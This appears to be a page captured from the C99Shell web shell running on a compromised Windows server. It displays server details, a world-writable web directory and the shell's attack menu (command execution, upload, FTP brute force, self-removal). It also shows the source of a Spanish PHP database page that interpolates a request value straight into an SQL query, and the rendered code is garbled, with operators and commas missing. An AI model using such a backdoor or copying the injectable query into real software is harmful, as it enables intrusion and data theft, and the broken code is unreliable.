!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\nrc\   drwxrwxrwx
Free 8.81 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Inicio.php (3.73 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Consulta Red Capital</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="8">
  <tr> 
    <td>&nbsp;</td>
    <td><form name="form2" method="post" action="detalleentidad.php">
        <table width="100%" border="0" cellspacing="0" cellpadding="8">
          <tr> 
            <td width="30%">Entidades:</td>
            <td width="70%"><select name="id" id="id">
                <?php
            
// Procedure 1, Entidades
            
include('connect.php');
            
$stmt ociparse($c1,"SELECT CODIGO, NOMBRE FROM ENTIDADES ORDER BY NOMBRE");
            
$result OCIExecute($stmt);
            while (
OCIFetchInto($stmt$cur)) {
                
$codigo_e $cur[0];
                
$nombre_e $cur[1];
                echo 
"<option value=\"$codigo_e\">$nombre_e</option>";
            }
            
// Entidad End
            
?>
              </select></td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> 
                <input type="submit" name="Submit" value="Ver Detalle Entidad...">
              </div></td>
          </tr>
        </table>
      </form></td>
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
    <td><form name="form2" method="post" action="">
        <table width="100%" border="0" cellspacing="0" cellpadding="8">
          <tr> 
            <td width="30%">Entidades:</td>
            <td width="70%"><select name="codigo_entidad" id="codigo_entidad">
                <?php
            
// Procedure 1, Entidades
            
$stmt ociparse($c1,"SELECT CODIGO, NOMBRE FROM ENTIDADES ORDER BY NOMBRE");
            
$result OCIExecute($stmt);
            while (
OCIFetchInto($stmt$cur)) {
                
$codigo_e $cur[0];
                
$nombre_e $cur[1];
                echo 
"<option value=\"$codigo_e\">$nombre_e</option>";
            }
            
// Entidad End
            
?>
              </select></td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> 
                <input type="submit" name="Submit" value="Filtrar Tr&aacute;mites...">
              </div></td>
          </tr>
        </table>
      </form></td>
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td width="25%">&nbsp;</td>
    <td width="50%"><form name="form1" method="post" action="detalletramite.php">
        <table width="100%" border="0" cellspacing="0" cellpadding="8">
          <tr> 
            <td width="30%">Tr&aacute;mites:</td>
            <td width="70%"><select name="codigo_tramite" id="codigo_tramite">
                <?php
            
// Determina el tipo de consulta
            
$isce = isset($codigo_entidad);
            if (
$isce == false) {
                
// Procedure 2, Tramites
                
$stmt ociparse($c1,"SELECT CODIGO, NOMBRE FROM TRAMITES WHERE ESTADO=4 or ESTADO=0 ORDER BY NOMBRE");
                
$result OCIExecute($stmt);
                while (
OCIFetchInto($stmt$cur)) {
                    
$codigo_t $cur[0];
                    
$nombre_t $cur[1];
                    echo 
"<option value=\"$codigo_t\">$nombre_t</option>";
                }
                
// Entidad End
            
}else{
                
// Procedure 2, Tramites
                
$stmt ociparse($c1,"SELECT CODIGO, NOMBRE FROM TRAMITES WHERE CODENTI=$codigo_entidad and (ESTADO=4 or ESTADO=0) ORDER BY NOMBRE");
                
$result OCIExecute($stmt);
                while (
OCIFetchInto($stmt$cur)) {
                    
$codigo_t $cur[0];
                    
$nombre_t $cur[1];
                    echo 
"<option value=\"$codigo_t\">$nombre_t</option>";
                }
                
// Entidad End
            
}
            
?>
              </select></td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> 
                <input type="submit" name="Submit2" value="Ver Detalle del Tr&aacute;mite...">
              </div></td>
          </tr>
        </table>
      </form></td>
    <td width="25%">&nbsp;</td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--